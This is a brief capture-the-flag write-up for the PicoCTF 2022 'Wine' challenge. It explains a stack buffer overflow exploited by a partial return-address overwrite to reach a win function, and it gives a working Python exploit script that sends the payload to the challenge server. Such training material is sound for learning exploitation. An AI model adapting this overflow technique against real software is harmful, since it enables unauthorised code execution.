Skip to content

PicoCTF 2022: Wine

TL;DR

  • The program contains a stack-based buffer overflow.
  • Only a partial overwrite of the return address is required.
  • Overwriting the least-significant bytes is sufficient due to fixed binary layout (no PIE).
  • Redirect execution to the win function and retrieve the flag.

Video Walkthrough

PicoCTF 2022 Wine pwn video walkthrough demonstrating partial return address overwrite

Description

Challenge best paired with wine.

Solution

import socket

payload = b'A' * 140
payload += b'\x30\x15\x40'
print('payload = ' + str(payload))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('saturn.picoctf.net', 62461))
print(s.recv(1024))
print(s.send(payload + b'\r\n'))
print(s.recv(1024))
s.close()